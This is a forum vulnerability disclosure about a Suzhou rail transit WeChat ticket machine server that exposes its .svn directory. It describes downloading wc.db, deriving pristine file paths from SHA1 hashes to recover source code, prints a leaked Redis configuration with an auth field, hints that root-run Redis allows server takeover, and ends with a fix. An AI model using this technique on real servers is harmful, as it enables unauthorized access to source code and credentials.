HanDs
管理员

[7月漏洞公开] 苏州轨道交通信息泄露严重问题 



前几天去苏州旅游,坐地铁遇到啦这么高科技的东西【云购票机微信支付】

详细说明:

FBC042C95F2A49A2E1106B6833A2D40F.png



FDF9F8BF51856B98E87F7BF743636885.png



回家没事看这个微信地址发现啦.svn信息惊呆啦,继续深入发现

http://**.**.**.**:8090/.svn/wc.db 下载啦个SQLiteSpy.exe来读取数据库信息



)%60%}}T}EA6][JK}}@RTXV.png



怎么查看代码信息呢,原来是这样找到对应文件的效验信息$sha1$ 取md5前两位作为子文件夹即可得到该文件夹的源代码

Application/Home/Conf/config.php 54147de0309dbf67abfd209a09cbe541508f8f57

http://**.**.**.**:8090/.svn/pristine/54/54147de0309dbf67abfd209a09cbe541508f8f57.svn-base

http://**.**.**.**:8090/.svn/pristine/6c/6c9d2d12321e5d44e986f4ba5a47b2396400ca8a.svn-base

在其他ip发现啦redis root权限可以拿下服务器你们懂得

http://**.**.**.**:8081/.svn/pristine/f8/f88de23430a626342e404c71399eeb070792ebc9.svn-base

/* redis 配置 */

'DATA_CACHE_PREFIX' => 'redis_tem_',

'DATA_CACHE_TYPE' => 'Redis', //默认动态缓存为Redis

'REDIS_RW_SEPARATE' => false, //Redis读写分离 true 开启

'REDIS_HOST' => '**.**.**.**', //redis服务器ip,多台用逗号隔开;读写分离开启时,第一台负责写,其它[随机]负责读;

'REDIS_PORT' => '6379', //端口号

'DATA_CACHE_TIMEOUT' => '300', //超时时间

'REDIS_PERSISTENT' => false, //是否长连接 false=短连接

'REDIS_AUTH' => '[email protected]', //AUTH认证密码

'DATA_CACHE_TIME' => '10800', // 数据缓存有效期 0表示永久缓存

/* 【replace end】 */

_~B]Z%OADNIAUM7]$_}4$6U.png







漏洞证明:

QPTJ@V{3F$~J1_8@7TF{{GX.png



LQ~HO[7QU{SN~HRM`KP648X.png



服务器中还泄露啦 svn连接地址你们所开发的所以项目都在里面,安全要注意啦

修复方案:

服务器中还泄露啦 svn连接地址你们所开发的所以项目都在里面,安全要注意啦,线上服务器尽量别保留 .svn信息或者对该文件进行处理设置403及无读取权限.redis别默认端口及root启动


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
苏州 轨道 交通 信息 泄露 严重 问题
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复